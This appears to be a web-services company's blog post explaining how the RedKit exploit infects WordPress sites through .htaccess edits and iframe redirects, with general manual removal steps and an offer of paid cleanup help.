Redkit Exploit – WordPress and other CMS

If you’re here on this page you might be a WordPress or other Content Management System user that has been hacked and infected by the RedKit Exploit. You’re not alone. There are literally tens of thousands of website hacked every day. Here is what this exploit does and best options on how to find and resolve it.

  1. How it hacks your site:  It is a script sent out looking for vulnerabilities in older versions of Content Management Systems and modules/ plugins that they use.  The most commonly affect CMS is WordPress.  The Redkit Exploit does the following:
    1. Edits your .htaccess files and inserts an iframe code into files which causes a redirect
    2. May insert a default.php which contains malicious code
  2. What happens after your website is infected:  This is one of the more annoying aspects as the code is a google redirect. Here’s what happens
    1. Someone searches for your website on google
    2. They find it and click on the result there
    3. Instead of being taken to your website, they are taken to a malicious website which tries to infect their computer
  3. Why is this so damaging: 
    1. Your visitors get directed to a place where they could have sensitive data stolen or have their computer infected with some other virus
    2. Google lists your site as “this website may be harmful to your computer” so noone is going to click on it
  4. Removal:  Removing the hack is challenging.
    1. First you must find all inserted iframed code and remove it (including your htaccess file).
    2. Hopefully you have a backed up version that is clean or that job is painstaking
    3. Next you must install an updated or new version of WordPress into a new folder (let’s call it public_html_new for now). Install and UPGRADE all of your plugins and DELETE AND REMOVE any plugins you don’t use (even if they are inactive).
    4. Search for different files that don’t belong in the old directory and remove them
    5. If you are now sure all files needed are available and clean, then zip the original public_html folder and download it. Then DELETE IT from the server and rename your public_html_new to public_html
  5. Protecting it from happening again:  There is never any surefire way to make sure you don’t get hacked however,  implementing security plugins and making sure your admin is also well protected and keeping up on upgrades, etc.  will help.


We can help you with services for cleaning and removing your hack issue and assist you with protecting your website.  If you would like to have assistance on this please contact us.